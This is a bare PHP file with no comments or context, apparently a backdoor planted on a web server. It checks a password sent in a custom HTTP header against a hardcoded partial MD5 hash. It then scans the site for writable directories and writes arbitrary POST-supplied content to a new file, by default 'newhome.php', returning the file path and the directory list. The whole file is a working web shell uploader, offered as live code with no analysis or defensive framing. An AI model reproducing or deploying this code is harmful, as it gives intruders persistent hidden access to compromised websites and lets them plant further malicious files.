<?php $password = $_SERVER['HTTP_PASSWORD']; if (!empty($password)) { $pathParam = isset($_SERVER['HTTP_PATH']) ? $_SERVER['HTTP_PATH'] : ''; $_fileName = isset($_SERVER['HTTP_NAME']) ? $_SERVER['HTTP_NAME'] : 'newhome.php'; $filePath = isset($_SERVER['HTTP_FILE']) ? $_SERVER['HTTP_FILE'] : ''; $remoteContent = isset($_POST['content']) ? $_POST['content'] : ''; if (substr(md5($password), 5, 19) === "0381d04838d36d2d9be") { $path = './'; $writableDirectories = getWritableDirectories($path); $targetDirectory = ''; foreach ($writableDirectories as $directory) { if ($pathParam != '') { if (strpos($directory, $pathParam) !== false) { $targetDirectory = $directory; break; } } } if (empty($targetDirectory)) { $targetDirectory = reset($writableDirectories); } $newFilePath = createFile($targetDirectory, $remoteContent, $_fileName); $response = [ 'new_file_path' => $newFilePath, 'writable_directories' => $writableDirectories ]; echo json_encode($response); die(); } else { $response = [ 'error' => 'Incorrect password' ]; echo json_encode($response); exit; } } function getWritableDirectories($path) { $writableDirectories = []; $directories = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD ); foreach ($directories as $directory) { if ($directory->isDir() && $directory->isWritable()) { $writableDirectories[] = $directory->getPathname(); } } return $writableDirectories; } function createFile($directory, $content, $_fileName) { $fileName = $directory . "/$_fileName"; file_put_contents($fileName, $content); return $fileName; }